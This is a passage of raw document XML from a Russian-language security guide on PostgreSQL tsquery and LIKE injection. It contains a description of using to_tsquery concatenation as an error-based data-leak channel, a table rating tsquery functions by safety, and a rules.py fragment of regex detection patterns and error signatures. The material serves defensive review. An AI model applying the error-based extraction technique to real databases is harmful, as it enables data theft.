        <w:t xml:space="preserve"> — нулевая API regression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CB732" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.4 tsquery как error-based канал</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в аргументах </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-subquery → leaked extracted value в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: text search configuration "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t>. Защита: bind для всех аргументов + Literal/regconfig-cast + error-handler middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CBB54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сводная таблица: функции tsquery с точки зрения безопасности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7"/>
        <w:gridCol w:w="1216"/>
        <w:gridCol w:w="1217"/>
        <w:gridCol w:w="1702"/>
        <w:gridCol w:w="1031"/>
        <w:gridCol w:w="1677"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="3FC157CA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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CFB47E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Функция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F024036" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Парсит operators</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466228C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Syntax error на bad input</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D4820E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Поддерживает phrase</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323727E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG-версия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="156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1EC4288" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Безопасность для user-input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="233410DD"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51A7F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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A48DF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да, все operators</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E5EB75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ERROR + leak input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86B4FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да (через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w: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D9D3FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.3+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A61302" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>уязвимо</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 3.15.2 + 3.15.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3596C1EB"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77BFA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>plainto_tsquery(q)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0073E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (ignored)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6B905B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</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8DBD51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (всегда AND)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A48021" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.3+</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D43234" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>безопасно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="06B054D7"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9A23B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>phraseto_tsquery(q)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593164" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (ignored)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C8CABB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</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163615" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да (всегда phrase)</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25AEC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.6+</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AED865" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>безопасно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5F78FA16" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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B36DC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>websearch_to_tsquery(q)</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877BE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>restricted subset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A93C7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (gracefully ignored)</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824CA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да (через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"..."</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</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C3297D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11+</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1B6831" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>рекомендация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F1F1979" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Хук для rules.py: класс PATTERN_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27211DFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># rules.py фрагмент — детекция pattern/tsquery injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C881D05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE25CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D1346" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PATTERN_INJECTION_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E292A31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.15.1: LIKE с bind, без сопровождающего escape-helper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C445165" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (требует анализа окружения — runtime-helper или AST-walk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F3875A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bI?LIKE\s+:\w+", re.IGNORECASE),                       # LIKE :var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C649B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bI?LIKE\s+['\"]%\{", re.IGNORECASE),                   # LIKE '%{var}%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC7124" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D3C08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.15.2: to_tsquery с user-input (требует review)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94E377" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\([^)]*:\w+\)", re.IGNORECASE),          # to_tsquery(:var)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6F691" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\([^)]*,\s*:\w+\)", re.IGNORECASE),      # to_tsquery('lang', :var)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258DE435" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F787C53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.15.4: concat в аргументах to_tsquery — критично</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C466965" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\([^)]*\|\|", re.IGNORECASE),            # to_tsquery(... || ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14464174" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bto_tsquery\s*\(\s*f['\"]", re.IGNORECASE),            # to_tsquery(f"...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649B8FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354A7E14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.15.4: f-string в SQL вокруг to_tsquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D399A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"text\s*\(\s*f['\"][^'\"]*to_tsquery", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9C9EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F84360D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A9053" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PATTERN_INJECTION_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FA6E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: PG-сторона</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551E0B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "syntax error in tsquery: \"",                          # 3.15.4 leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31262080" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "text search configuration \"[^\"]+\" does not exist",  # 3.15.4 Variant B leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB99070" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "canceling statement due to statement timeout",         # 3.15.1 DoS-индикатор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6EC88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D010F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE8C9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Дополнительная рекомендация для rules.py:</w:t>
      </w:r>
    </w:p>
